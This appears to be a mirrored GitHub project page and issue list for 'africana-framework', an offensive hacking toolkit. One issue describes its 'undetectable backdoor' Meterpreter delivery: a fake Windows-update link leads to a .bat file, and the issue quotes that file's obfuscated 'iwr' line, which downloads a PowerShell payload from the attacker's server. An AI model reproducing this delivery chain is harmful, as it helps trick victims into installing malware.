Giter VIP home page Giter VIP logo

r0jahsm0ntar1 / africana-framework Goto Github PK

View Code? Open in Web Editor NEW
17.0 4.0 7.0 162.06 MB

The africana-framework is a software designed for network & web hacking by automating as much stuff as possible to detect vulnerabilities on most common services and web technologies. It also has some wide range of penetration testing from internal network, Wi-Fi, system anonymity to web bug hunting. It's purely written for Good and not Evil.

Go 96.61% Shell 3.39%
automated-pentesting bounty-hunting c2-framework malware-development mitm pentesting pentesting-framework redteam reverse-shell sqlinjection

africana-framework's People

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar

africana-framework's Issues

Error when trying to select Meterpreter

It was working fine in the Python3 version but not anymore in the Go version. When I select Generate undetectable backdoors and then Meterpreter I'm having the following error:

bash: line 1: cd: /root/.africana/africana-base/meterpeter/: No such file or directory
The argument 'meterpeter.ps1' is not recognized as the name of a script file. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

Usage: pwsh[.exe] [-Login] [[-File] [args]]
[-Command { - | [-args ]
| [] } ]
[-ConfigurationName ] [-CustomPipeName ]
[-EncodedCommand ]
[-ExecutionPolicy ] [-InputFormat {Text | XML}]
[-Interactive] [-MTA] [-NoExit] [-NoLogo] [-NonInteractive] [-NoProfile]
[-OutputFormat {Text | XML}] [-SettingsFile ] [-SSHServerMode] [-STA]
[-Version] [-WindowStyle <style>] [-WorkingDirectory ]

   pwsh[.exe] -h | -Help | -? | /?

PowerShell Online Help https://aka.ms/powershell-docs

All parameters are case-insensitive.
Process finished with error: exit status 64

There's no africana-base folder under /root/.africana

Please correct your typo, it's not meterpeter but meterpreter.
Thanks

Wrong IP in .bat file when creating a Meterpreter

When generating a undetectable backdoor and then a meterpreter (you wrote meterpeter in your menu and should be meterpreter) we are getting a link that can be sent to a client with our local IP looking like this : http://192.168.5.29/Update-KB5005101.html.
When the client click on that link it will download a .zip file containing a .bat file. When the client execute the .bat file it should download a .ps1 file located in our local Apache server with the IP we entered when creating the meterpreter 192.168.5.29 but the .bat file as the following IP: iwr -Uri "ht%i0%tp://127.0.0.1/Update-KB50%i0_%05101.ps1".

The link in the .bat file should be iwr -Uri "ht%i0%tp://192.168.5.29/Update-KB50%i0_%05101.ps1" it should be our local ip not 127.0.0.1. If you manually replace the 127.0.0.1 with your local ip everything is working fine. Probably something in your meterpeter.ps1 file that needs to be changed. Please fix
Thank you.

its not works

its just show title without any option to create maleware or something it just do figlet and exit

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.